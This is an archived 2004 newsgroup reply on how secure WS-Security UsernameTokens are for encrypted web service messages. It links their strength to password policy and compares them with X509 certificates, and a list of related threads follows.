Re: How Secure Are Username Token Encrypted Messages

From: Softwaremaker (msdn_at_removethis.softwaremaker.net)
Date: 12/09/04 

Date: Thu, 9 Dec 2004 08:30:07 +0800

Hi Josh,

I hope you dont mind me chipping my 0.02 worth into this conversation.

Usernametokens are as secure as your passwords. That means that if you have
a good security policy on how your company treats passwords, ie...

1) Minimum length
2) Different characters
3) Password Change Frequency (in months instead of years ;-))
4) Elimination of Weak Passwords such as using names and such
5) ...

your Usernametokens can be fairly secure.

If you dont treat your passwords with good companies' password policies,
then you cannot expect Usernametokens to give your message as secure a
protection as anyone would like.

I doubt WS-I or OASIS would include Usernametokens inside the WS-Security
specs if they doubt its security. Implemenation is the key.

For the thread about PasswordOption.sendnone or sendhashed, the hash of the
password plus other elements are used to produce the cipher. NO password is
sent over using the SendNone option. In fact, imho, I would recommend this
option best.

Another thing to take note is one that relates to the real world. I believe
Usernametokens have its place here. It is easiest to implement and common in
any business environments. Therefore, it can be plugged into any existing IT
systems with relatively lesser effort. Also, X509 digital certs are usually
used to authenticate machines and / or companies, it would be more expensive
to expect every user in an organization to have a digital cert and a private
/ public key pair. Usernametokens are more appt to authenticate the users
themselves in the real world. However, if you are using authentication
between machines, you may want to opt for X509s instead.

Hope I have cleared some confusion. 

-- 
Thank you.
Regards,
Softwaremaker
http://www.softwaremaker.net/blog
=========================================
"Josh Pollard" <JoshPollard@discussions.microsoft.com> wrote in message
news:52A9959B-B74C-4F98-A5C9-998F7B49C024@microsoft.com...
> How secure is it to encrypt the body of a message with a Username token?
In
> the HOL it says that it is not very secure. It doesn't say why though.
It's
> obviously not as secure as encrypting with a binary token, but I would
like a
> more in depth reason as to what it makes it not very secure.
>
> Thanks!
>
> ---------------------------------
> Josh Pollard
> josh.glmotorsports.net/blog

Relevant Pages

  • Re: How Secure Are Username Token Encrypted Messages
    ... I wouldn't want to have a cleartext pwd database on my web server.... ... Usernametokens are as secure as your passwords. ...
    (microsoft.public.dotnet.framework.webservices.enhancements)
  • Re: getting rid of reset disc
    ... Assign all new passwords to all accounts and password protect your BIOS. ... Go through this list and secure your PC. ... using Windows XP "prettifications". ... You should at least turn on the built in firewall. ...
    (microsoft.public.windowsxp.security_admin)
  • Low-Hassle Ways to Secure Your Computer System (article)
    ... Low-Hassle Ways to Secure Your Computer System ... If time were no object, we'd all live a more secure computer life—we'd beef up our browsers, use complex passwords, and keep our data locked up with encryption Skynet couldn't crack. ... We've rounded up a good deal of these swift and simple security fixes for Windows, Mac, and Linux, so bust out the tinfoil hats and check 'em out after the jump. ...
    (alt.privacy)
  • Re: Secure FTP
    ... there is no way to do FTP that securely encrypts passwords without ... Microsoft IIS can be plenty secure if you configure it properly and install ...
    (microsoft.public.win2000.security)
  • Re: newbie with www user security problem
    ... The box is secure that much i have found out. ... everyone passwords on the box. ... i am in the process of upgrading the ports now and there are problems ... page and more customization. ...
    (FreeBSD-Security)